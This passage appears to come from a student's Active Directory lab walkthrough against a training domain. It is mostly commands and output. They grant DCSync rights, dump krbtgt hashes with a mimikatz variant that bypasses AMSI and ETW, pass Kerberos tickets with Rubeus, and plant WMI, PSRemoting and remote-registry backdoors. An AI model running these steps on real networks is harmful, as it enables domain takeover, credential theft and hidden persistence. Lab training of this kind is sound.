AQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FM
[*] Target LUID: 0x17ae61
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/2/2024 6:00:16 AM
EndTime : 7/2/2024 4:00:16 PM
RenewTill : 7/9/2024 6:00:16 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : uJI37jPwPkH7jkGeoKP+9VnSwT1AgO//dIRYIMGHFYA=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt opens with administrative privileges. We give DCSync permissions to the
student163 using PowerView function Add-ObjectACL.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Add-ObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalIdentity student163 -Verbose -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local
-TargetDomain dollarcorp.moneycorp.local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student163)(name=student163)(displayname=student163)))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student163)(name=student163)(displayname=student163))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local 'DCSync'
on DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' on DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' on DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '89e95b76-444d-4c62-991a-0facbeda640c' on DC=dollarcorp,DC=moneycorp,DC=local

We open a new shell to check the permissions we have on the Domain Object.
PS C:\Windows\system32> . C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll
C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Get-ObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -
SearchScope Base -ResolveGUIDs | ? { ($_.ObjectAceType -match 'replication-get') -or
($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')
} | foreach {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName
$_.SecurityIdentifier);$_} | ? {$_.IdentityName -match 'student163' }

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\student163

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\student163

AceQualifier : AccessAllowed
ObjectDN : DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : ExtendedRight
ObjectAceType : DS-Replication-Get-Changes-All
ObjectSID : S-1-5-21-719815819-3726368948-3917688648
InheritanceFlags : None
BinaryLength : 56
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask : 256
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
IdentityName : dcorp\student163

We will execute DCSync attack.

C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe"
"lsadump::dcsync /user:dcorp\krbtgt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt

[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt

Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
02 86615bb9bf7e3c731ba1cb47aa89cf6d
03 637dfb61467fdb4f176fe844fd260bac
04 a0e60e247b498de4cacfac3ba615af01
05 86615bb9bf7e3c731ba1cb47aa89cf6d
06 d2874f937df1fd2b05f528c6e715ac7a
07 a0e60e247b498de4cacfac3ba615af01
08 e8ddc0d55ac23e847837791743b89d22
09 e8ddc0d55ac23e847837791743b89d22
10 5c324b8ab38cfca7542d5befb9849fd9
11 f84dfb60f743b1368ea571504e34863a
12 e8ddc0d55ac23e847837791743b89d22
13 2281b35faded13ae4d78e33a1ef26933
14 f84dfb60f743b1368ea571504e34863a
15 d9ef5ed74ef473e89a570a10a706813e
16 d9ef5ed74ef473e89a570a10a706813e
17 87c75daa20ad259a6f783d61602086aa
18 f0016c07fcff7d479633e8998c75bcf7
19 7c4e5eb0d5d517f945cf22d74fec380e
20 cb97816ac064a567fe37e8e8c863f2a7
21 5adaa49a00f2803658c71f617031b385
22 5adaa49a00f2803658c71f617031b385
23 6d86f0be7751c8607e4b47912115bef2
24 caa61bbf6b9c871af646935febf86b95
25 caa61bbf6b9c871af646935febf86b95
26 5d8e8f8f63b3bb6dd48db5d0352c194c
27 3e139d350a9063db51226cfab9e42aa1
28 d745c0538c8fd103d71229b017a987ce
29 40b43724fa76e22b0d610d656fb49ddd

mimikatz(commandline) # exit
Bye!

Any changes made to the ACL of the Domain Object generates event ID 4662 with the detail "Directory
Object Access Right DACL was performed ".

Using ACLs - Security Descriptors

WMI
It is possible to modify the Security Descriptors (security information like Owner, Primary Group, DACL
and SACL) of multiple remote access methods (WMI, PowerShell Remoting, Remote Registry etc. ) to allow
access to non-admin users. Administrative privileges are required for this.

Works as a very, useful and impactful backdoor mechanism.

Security Descriptor Definition Language defines the format which is used to describe a security descriptor.
SDDL uses ACE strings for DACL and SACL:

ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid

ACE for built-in administrators for WMI namespaces.

A;CI;CCDCLCSWRPWPRCWD;;;BA
Since administrator privileges are required for this, if you want to access WMI on the domain controller,
domain administrator privileges are required.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> $env:username
student163
PS C:\Windows\system32> Get-WmiObject -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Class
win32_OperatingSystem -Namespace root\Cimv2 | fl *
Get-WmiObject : Access is denied.
At line:1 char:1
+ Get-WmiObject -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Clas ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException
+ FullyQualifiedErrorId :
System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

Initially we are not able to access WMI. We will give relevant permissions to our student account so that
we can access the WMI. For this we will use the RACE toolkit.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : TTW95PEJ
[*] Domain : 89B3Z8Y2
[*] Password : K4IDDNM1
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3896
[+] LUID : 0x17ae61

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 1551969
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
[*] Target LUID: 0x17ae61
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/2/2024 6:00:16 AM
EndTime : 7/2/2024 4:00:16 PM
RenewTill : 7/9/2024 6:00:16 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : uJI37jPwPkH7jkGeoKP+9VnSwT1AgO//dIRYIMGHFYA=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt opens with the Domain Administrator privileges.

C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll
C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\RACE.ps1
PS C:\Windows\system32> Set-RemoteWMI -SamAccountName student163 -ComputerName dcorp-
dc.dollarcorp.moneycorp.local -Namespace root\cimV2 -Verbose
VERBOSE: Existing ACL for namespace root\cimV2 is
O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-
13616)(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719
815819-3726368948-3917688648-
13611)(A;CIID;CCDCLCSWRPWPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP
;;;AU)
VERBOSE: Existing ACL for DCOM is
O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-
562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCD
CSW;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-
991631256)(A;;CCDCLCSWR
P;;;S-1-5-21-719815819-3726368948-3917688648-13616)(A;;CCDCLCSWRP;;;S-1-5-21-719815819-
3726368948-3917688648-13611)
VERBOSE: New ACL for namespace root\cimV2 is
O:BAG:BAD:(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-
13616)(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719
815819-3726368948-3917688648-
13611)(A;CIID;CCDCLCSWRPWPRCWD;;;BA)(A;CIID;CCDCRP;;;NS)(A;CIID;CCDCRP;;;LS)(A;CIID;CCDCRP
;;;AU)(A;CI;CCDCLCSWRPWPRCWD;;;S-1-5-21-719815819-3726368948-3917688648-13603)
VERBOSE: New ACL for DCOM
O:BAG:BAD:(A;;CCDCLCSWRP;;;BA)(A;;CCDCSW;;;WD)(A;;CCDCLCSWRP;;;S-1-5-32-
562)(A;;CCDCLCSWRP;;;LU)(A;;CCDCSW;;;AC)(A;;CCD
CSW;;;S-1-15-3-1024-2405443489-874036122-4286035555-1823921565-1746547431-2453885448-3625952902-
991631256)(A;;CCDCLCSWR
P;;;S-1-5-21-719815819-3726368948-3917688648-13616)(A;;CCDCLCSWRP;;;S-1-5-21-719815819-
3726368948-3917688648-13611)(A;;
CCDCLCSWRP;;;S-1-5-21-719815819-3726368948-3917688648-13603)

Now we will access WMI with our normal student account.

PS C:\Windows\system32> Get-WmiObject -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Class
win32_OperatingSystem -Namespace root\Cimv2 | fl *

PSComputerName : DCORP-DC
Status : OK
Name : Microsoft Windows Server 2022
Standard|C:\Windows|\Device\Harddisk0\Partition3
FreePhysicalMemory : 883540
FreeSpaceInPagingFiles : 404908
FreeVirtualMemory : 1367796
__GENUS : 2
__CLASS : Win32_OperatingSystem
__SUPERCLASS : CIM_OperatingSystem
__DYNASTY : CIM_ManagedSystemElement
__RELPATH : Win32_OperatingSystem=@
__PROPERTY_COUNT : 64
__DERIVATION : {CIM_OperatingSystem, CIM_LogicalElement,
CIM_ManagedSystemElement}
__SERVER : DCORP-DC
__NAMESPACE : root\Cimv2
__PATH : \\DCORP-DC\root\Cimv2:Win32_OperatingSystem=@
BootDevice : \Device\HarddiskVolume1
BuildNumber : 20348
BuildType : Multiprocessor Free
Caption : Microsoft Windows Server 2022 Standard
CodeSet : 1252
CountryCode : 1
CreationClassName : Win32_OperatingSystem
CSCreationClassName : Win32_ComputerSystem
CSDVersion :
CSName : DCORP-DC
CurrentTimeZone : -420
DataExecutionPrevention_32BitApplications : True
DataExecutionPrevention_Available : True
DataExecutionPrevention_Drivers : True
DataExecutionPrevention_SupportPolicy : 3
Debug : False
Description :
Distributed : False
EncryptionLevel : 256
ForegroundApplicationBoost : 2
InstallDate : 20221111053444.000000-480
LargeSystemCache :
LastBootUpTime : 20240701104558.800971-420
LocalDateTime : 20240702095749.113000-420
Locale : 0409
Manufacturer : Microsoft Corporation
MaxNumberOfProcesses : 4294967295
MaxProcessMemorySize : 137438953344
MUILanguages : {en-US}
NumberOfLicensedUsers :
NumberOfProcesses : 75
NumberOfUsers :
OperatingSystemSKU : 7
Organization :
OSArchitecture : 64-bit
OSLanguage : 1033
OSProductSuite : 272
OSType : 18
OtherTypeDescription :
PAEEnabled :
PlusProductID :
PlusVersionNumber :
PortableOperatingSystem : False
Primary : True
ProductType : 2
RegisteredUser : Windows User
SerialNumber : 00454-30000-00000-AA745
ServicePackMajorVersion : 0
ServicePackMinorVersion : 0
SizeStoredInPagingFiles : 814684
SuiteMask : 272
SystemDevice : \Device\HarddiskVolume3
SystemDirectory : C:\Windows\system32
SystemDrive : C:
TotalSwapSpaceSize :
TotalVirtualMemorySize : 2910756
TotalVisibleMemorySize : 2096072
Version : 10.0.20348
WindowsDirectory : C:\Windows
Scope : System.Management.ManagementScope
Path : \\DCORP-DC\root\Cimv2:Win32_OperatingSystem=@
Options : System.Management.ObjectGetOptions
ClassPath : \\DCORP-DC\root\Cimv2:Win32_OperatingSystem
Properties : {BootDevice, BuildNumber, BuildType, Caption...}
SystemProperties : {__GENUS, __CLASS, __SUPERCLASS, __DYNASTY...}
Qualifiers : {dynamic, Locale, provider, Singleton...}
Site :
Container :

PowerShell Remoting
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -
ScriptBlock { hostname;whoami }
[dcorp-dc.dollarcorp.moneycorp.local] Connecting to remote server dcorp-
dc.dollarcorp.moneycorp.local failed with the
following error message : Access is denied. For more information, see the
about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [],
PSRemotingTransportException
+ FullyQualifiedErrorId : AccessDenied,PSSessionStateBroken

We will use RACE tool kit to give relevant permissions to the student user. This needs to be executed with
Domain Administrative privileges.

PS C:\Windows\system32> Set-RemotePSRemoting -SamAccountName student163 -ComputerName dcorp-

dc.dollarcorp.moneycorp.local
[dcorp-dc.dollarcorp.moneycorp.local] Processing data from remote server dcorp-
dc.dollarcorp.moneycorp.local failed
with the following error message: The I/O operation has been aborted because of either a thread
exit or an application
request. For more information, see the about_Remote_Troubleshooting Help topic.
+ CategoryInfo : OpenError: (dcorp-dc.dollarcorp.moneycorp.local:String) [],
PSRemotingTransportException
+ FullyQualifiedErrorId : WinRMOperationAborted,PSSessionStateBroken

The error could be ignored. The error simply states that the target did not close the winrm connection
gracefully.

Now we will be able to access the domain controller using PSRemoting.

PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -
ScriptBlock { hostname;whoami }
dcorp-dc
dcorp\student163
Remote Registry back door
With this persistence mechanism, we can get the account hash of the machine account of the DC. Once
we have the machine account hash of the DC, we can execute silver ticket attacks to obtain domain admin
privileges.

This also requires RACE tool kit and domain administrator privileges.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : TTW95PEJ
[*] Domain : 89B3Z8Y2
[*] Password : K4IDDNM1
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3896
[+] LUID : 0x17ae61

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 1551969
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGAjCCBf6gAwIBBaEDAgEWooIE2TCCBNVhggTRMIIEzaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BHUwggRxoAMCARKhAwIBAqKCBGMEggRfOZEb8NHhIDalOW8nP3d4BUs9N79CIo+7FyaLe0ixODhR0L4c
IGKIRdyPUnus/BOi1ncAA4OmpYQO7+ZU8P/yThrJNOSelGS6IhKT8YPMpXwt7jkTKJVMyuSXy/79jXON
SrDXvq5SsGriyZWleNJAfVyNlDj/2W7DmXLKbWDV/88uhGxh/o5xjFwTM3fOW/hQuIb3AopYKtLIYPjA
99RkwWJlex3VfIjwAVFa4gQ8P06uTaqIPhdHL95wig1ktBM2Y83GQkwNxtsRGoAEq98Be/kTLQWsDbJv
ZZ7oIsAvp7lRPCdryITY3MbYGhg4cK5IVjQoW3MGPkfz2c5h0Et8caBjiQtuWTDcqSJiQWv4gd86XWuY
LppGpSk/1YQ/dCh0eYa9lG5AAd9rt42SJdMyFdaUE/vEAquiZsoN+80IElISKedRUKPo+X5mfv5kP/nx
